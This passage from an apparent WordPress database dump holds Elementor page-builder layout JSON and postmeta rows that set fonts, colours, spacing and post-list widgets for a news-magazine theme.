t_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1086,404,'_elementor_version','0.4'),(1087,404,'_elementor_css','a:3:{s:4:\"time\";i:1508851349;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1091,405,'_edit_last','1'),(1092,405,'_edit_lock','1509542115:1'),(1096,405,'_wp_page_template','default'),(1099,408,'_elementor_edit_mode','builder'),(1100,408,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"